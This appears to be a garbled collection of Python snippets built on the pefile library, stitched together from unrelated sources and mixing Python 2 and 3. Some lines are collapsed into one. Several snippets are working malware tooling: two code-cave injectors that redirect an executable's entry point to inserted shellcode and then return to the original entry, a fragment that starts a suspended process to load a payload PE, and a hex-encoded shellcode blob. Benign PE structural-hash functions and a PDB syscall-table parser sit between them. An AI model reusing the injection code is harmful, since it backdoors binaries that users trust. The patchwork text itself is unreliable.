        raw_pe_data = pe.write()
        jmp_to = OEP - pe.get_rva_from_offset(scode_end_off)
        shellcode = '\x60%s\x61\xe9%s' % (shellcode, pack('I', jmp_to & 0xffffffff))
        final_data = list(raw_pe_data)
        final_data[scode_start_off:scode_start_off + len(shellcode)] = shellcode
        final_data = ''.join(final_data)
        raw_pe_data = final_data
        pe.close()
        while True:
            final_pe_file = "{0}".format(str(randint(0, 999999999)))
            if not os.path.isfile(final_pe_file):
                break
        new_file = open(final_pe_file, 'wb')
        new_file.write(raw_pe_data)
        new_file.close()
        print("\nNew file: {0} saved!".format(final_pe_file))
        print('[*] Job Done! :)')
def injectPE(filename, shellcode, output_file):
    pe = PE(filename)
    original_entry_point = pe.OPTIONAL_HEADER.AddressOfEntryPoint
    (end_offset, end_offset_aligned, padding, permissions) = getEPDetails(pe)

    # check permissions
    print '[*] Permissions for entry point\'s section :', permissions.items()
    if permissions['exec'] == False:
        print '[!] Entry point is not executable! Wtf? Exiting!'
        exit(1)

    # check for enough padding to fit the payload
    print '[*] Found %d bytes of padding' % padding
    sc_size = len(shellcode) + 7  # +1 pusha, +1 popa, +5 rel32 jmp
    if padding < sc_size:
        print '[!] Not enough padding to insert shellcode :('
        exit(1)
    else:
        print '  [+] There is enough room for the shellcode!'
        print '  [+] start_va = 0x%08x, end_va = 0x%08x' % (
            pe.OPTIONAL_HEADER.ImageBase + pe.get_rva_from_offset(end_offset),
            pe.OPTIONAL_HEADER.ImageBase + pe.get_rva_from_offset(end_offset_aligned))
        print '  [+] start_offset = 0x%x, end_offset = 0x%x' % (end_offset, end_offset_aligned)

    # use the right-most bytes available
    sc_end_offset = end_offset_aligned
    sc_start_offset = sc_end_offset - sc_size
    print '[*] Placing the payload at :'
    print '  [+] start_va = 0x%08x, end_va = 0x%08x' % (
        pe.OPTIONAL_HEADER.ImageBase + pe.get_rva_from_offset(sc_start_offset),
        pe.OPTIONAL_HEADER.ImageBase + pe.get_rva_from_offset(sc_end_offset))
    print '  [+] start_offset = 0x%x, end_offset = 0x%x' % (sc_start_offset, sc_end_offset)

    # change the entry point
    changeEntryPoint(pe, pe.get_rva_from_offset(sc_start_offset))
    raw_data = pe.write()
    jmp_distance = original_entry_point - pe.get_rva_from_offset(sc_end_offset)

    # fix the shellcode to save register contents and jmp to original entry after completion
    shellcode = fixShellcode(shellcode, jmp_distance)
    raw_data = insertShellcode(raw_data, sc_start_offset, shellcode)

    # write the new file
    pe.close()  # close the 'opened' PE first
    new_file = open(output_file, 'wb')
    new_file.write(raw_data)
    new_file.close()
    print '[*] New file created :)'
def pehashng(pe_file):
    """ Return pehashng for PE file, sha256 of PE structural properties.

    :param pe_file: file name or instance of pefile.PE() class
    :return: SHA256 in hexdigest format, None in case of pefile.PE() error
    :rtype: str
    """
    if isinstance(pe_file, PE):
        exe = pe_file
    else:
        try:
            exe = PE(pe_file, fast_load=True)
        except PEFormatError as exc:
            logging.error("Exception in pefile.PE('%s') - %s", pe_file, exc)
            return

    def align_down_p2(number):
        return 1 << (number.bit_length() - 1) if number else 0

    def align_up(number, boundary_p2):
        assert not boundary_p2 & (boundary_p2 - 1), \
            "Boundary '%d' is not a power of 2" % boundary_p2
        boundary_p2 -= 1
        return (number + boundary_p2) & ~boundary_p2

    def get_dirs_status():
        dirs_status = 0
        for idx in range(min(exe.OPTIONAL_HEADER.NumberOfRvaAndSizes, 16)):
            if exe.OPTIONAL_HEADER.DATA_DIRECTORY[idx].VirtualAddress:
                dirs_status |= 1 << idx
        return dirs_status

    def get_complexity():
        complexity = 0
        if section.SizeOfRawData:
            complexity = len(compress(section.get_data())) * 7.0 / section.SizeOfRawData
            complexity = 8 if complexity > 7 else int(round(complexity))
        return complexity

    characteristics_mask = 0b0111111100100011
    data_directory_mask = 0b0111111001111111

    data = [
        pack("> H", exe.FILE_HEADER.Characteristics & characteristics_mask),
        pack("> H", exe.OPTIONAL_HEADER.Subsystem),
        pack("> I", align_down_p2(exe.OPTIONAL_HEADER.SectionAlignment)),
        pack("> I", align_down_p2(exe.OPTIONAL_HEADER.FileAlignment)),
        pack("> Q", align_up(exe.OPTIONAL_HEADER.SizeOfStackCommit, 4096)),
        pack("> Q", align_up(exe.OPTIONAL_HEADER.SizeOfHeapCommit, 4096)),
        pack("> H", get_dirs_status() & data_directory_mask),
    ]
    for section in exe.sections:
        data += [
            pack("> I", align_up(section.VirtualAddress, 512)),
            pack("> I", align_up(section.SizeOfRawData, 512)),
            pack("> B", section.Characteristics >> 24),
            pack("> B", get_complexity()),
        ]
    if not isinstance(pe_file, PE):
        exe.close()
    data_sha256 = sha256(b"".join(data)).hexdigest()
    return data_sha256
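# Hedged usage: pehashng() accepts either a path or an existing pefile.PE
# instance; 'a.exe' and 'b.exe' are placeholder names.
print(pehashng('a.exe'))
print(pehashng(PE('b.exe', fast_load=True)))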
print "\t[+]Successfully created suspended process! PID: " + str(processinfo.dwProcessId) print print "[" + str(stepcount) + "]Reading Payload PE file" stepcount += 1 File = open(payload_exe, "rb") payload_data = File.read() File.close() payload_size = len(payload_data) print "\t[+]Payload size: " + str(payload_size) print print "[" + str(stepcount) + "]Extracting the necessary info from the payload data." stepcount += 1 payload = PE(data=payload_data) payload_ImageBase = payload.OPTIONAL_HEADER.ImageBase payload_SizeOfImage = payload.OPTIONAL_HEADER.SizeOfImage payload_SizeOfHeaders = payload.OPTIONAL_HEADER.SizeOfHeaders payload_sections = payload.sections payload_NumberOfSections = payload.FILE_HEADER.NumberOfSections payload_AddressOfEntryPoint = payload.OPTIONAL_HEADER.AddressOfEntryPoint payload.close() MEM_COMMIT = 0x1000 MEM_RESERVE = 0x2000 PAGE_READWRITE = 0x4 payload_data_pointer = windll.kernel32.VirtualAlloc( None, c_int(payload_size + 1), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE )
addrs = [
    SyscallTable(0, 0, 0),
    SyscallTable(0, 0, 0),
]
values = [
    SyscallTable(0, 0, 0),
    SyscallTable(0, 0, 0),
]

if len(sys.argv) != 3:
    print("usage: %s <exe> <pdb>" % sys.argv[0], file=sys.stderr)
    sys.exit(1)

pe = PE(sys.argv[1])
pdb = pdbparse.parse(sys.argv[2])

sects = pdb.STREAM_SECT_HDR_ORIG.sections
gsyms = pdb.STREAM_GSYM
omap = pdb.STREAM_OMAP_FROM_SRC
omap_rev = pdb.STREAM_OMAP_TO_SRC

for tbl, addr in zip(names, addrs):
    for sym in gsyms.globals:
        if not hasattr(sym, 'offset'):
            continue
        try:
            virt_base = sects[sym.segment - 1].VirtualAddress
        except IndexError:
            continue
        off = sym.offset
def __init__(self, path, filename=None):
    self.pe = PE(path, fast_load=True)
    self.path = path
    self.filename = filename
    if filename is None:
        self.filename = os.path.basename(path)
+ "\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52\xe8\x8e\xff\xff" + "\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64" + "\x68\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89\xe6\x56" + "\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c\x24" + "\x52\xe8\x5f\xff\xff\xff\x68\x72\x73\x58\x20\x68\x72\x63" + "\x68\x65\x68\x65\x73\x65\x61\x68\x75\x67\x20\x52\x68\x43" + "\x57\x2f\x42\x31\xdb\x88\x5c\x24\x12\x89\xe3\x68\x65\x72" + "\x65\x58\x68\x61\x73\x20\x48\x68\x45\x53\x20\x57\x31\xc9" + "\x88\x4c\x24\x0b\x89\xe1\x31\xd2\x6a\x10\x53\x51\x52\xff" + "\xd0\x31\xc0\x50\xff\x55\x08" ) if __name__ == "__main__": exe_file = raw_input("Enter Path To Exe File ") final_pe_file = raw_input("Enter Path To New Exe File: ") pe = PE(exe_file) OEP = pe.OPTIONAL_HEADER.AddressOfEntryPoint pe_sections = pe.get_section_by_rva(pe.OPTIONAL_HEADER.AddressOfEntryPoint) align = pe.OPTIONAL_HEADER.SectionAlignment what_left = (pe_sections.VirtualAddress + pe_sections.Misc_VirtualSize) - pe.OPTIONAL_HEADER.AddressOfEntryPoint end_rva = pe.OPTIONAL_HEADER.AddressOfEntryPoint + what_left padd = align - (end_rva % align) e_offset = pe.get_offset_from_rva(end_rva + padd) - 1 scode_size = len(sample_shell_code) + 7 if padd < scode_size: # Enough space is not available for shellcode exit() # Code can be injected scode_end_off = e_offset scode_start_off = scode_end_off - scode_size pe.OPTIONAL_HEADER.AddressOfEntryPoint = pe.get_rva_from_offset(scode_start_off)
def get_pehash(pe_file):
    """ Return pehash for PE file, sha1 of PE structural properties.

    :param pe_file: file name or instance of pefile.PE() class
    :rtype : string SHA1 in hexdigest format
    """
    if isinstance(pe_file, PE):  # minimize mem. usage and time of execution
        exe = pe_file
    else:
        exe = PE(pe_file, fast_load=True)

    # Image Characteristics
    img_chars = pack('uint:16', exe.FILE_HEADER.Characteristics)
    pehash_bin = img_chars[0:8] ^ img_chars[8:16]

    # Subsystem
    subsystem = pack('uint:16', exe.OPTIONAL_HEADER.Subsystem)
    pehash_bin.append(subsystem[0:8] ^ subsystem[8:16])

    # Stack Commit Size, rounded up to a value divisible by 4096,
    # the Windows page boundary, 8 lower bits must be discarded
    # (in PE32+ it is 8 bytes)
    stack_commit = exe.OPTIONAL_HEADER.SizeOfStackCommit
    if stack_commit % 4096:
        stack_commit += 4096 - stack_commit % 4096
    stack_commit = pack('uint:56', stack_commit >> 8)
    pehash_bin.append(
        stack_commit[:8] ^ stack_commit[8:16] ^ stack_commit[16:24] ^
        stack_commit[24:32] ^ stack_commit[32:40] ^ stack_commit[40:48] ^
        stack_commit[48:56])

    # Heap Commit Size, rounded up to page boundary size,
    # 8 lower bits must be discarded
    # (in PE32+ it is 8 bytes)
    heap_commit = exe.OPTIONAL_HEADER.SizeOfHeapCommit
    if heap_commit % 4096:
        heap_commit += 4096 - heap_commit % 4096
    heap_commit = pack('uint:56', heap_commit >> 8)
    pehash_bin.append(
        heap_commit[:8] ^ heap_commit[8:16] ^ heap_commit[16:24] ^
        heap_commit[24:32] ^ heap_commit[32:40] ^ heap_commit[40:48] ^
        heap_commit[48:56])

    # Section structural information
    for section in exe.sections:
        # Virtual Address, 9 lower bits must be discarded
        pehash_bin.append(pack('uint:24', section.VirtualAddress >> 9))
        # Size Of Raw Data, 8 lower bits must be discarded
        pehash_bin.append(pack('uint:24', section.SizeOfRawData >> 8))
        # Section Characteristics, 16 lower bits must be discarded
        sect_chars = pack('uint:16', section.Characteristics >> 16)
        pehash_bin.append(sect_chars[:8] ^ sect_chars[8:16])
        # Kolmogorov Complexity, len(Bzip2(data))/len(data)
        # (0..1] ∈ R  ->  [0..7] ⊂ N
        kolmogorov = 0
        if section.SizeOfRawData:
            kolmogorov = int(round(
                len(compress(section.get_data())) * 7.0 / section.SizeOfRawData))
            if kolmogorov > 7:
                kolmogorov = 7
        pehash_bin.append(pack('uint:8', kolmogorov))

    assert 0 == pehash_bin.len % 8

    if not isinstance(pe_file, PE):
        exe.close()

    return sha1(pehash_bin.tobytes()).hexdigest()
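# Hedged usage note: get_pehash() relies on bitstring.pack for the bit-level
# fields and bz2.compress for the per-section complexity; the sample path below
# is an assumption.
print(get_pehash('sample.exe'))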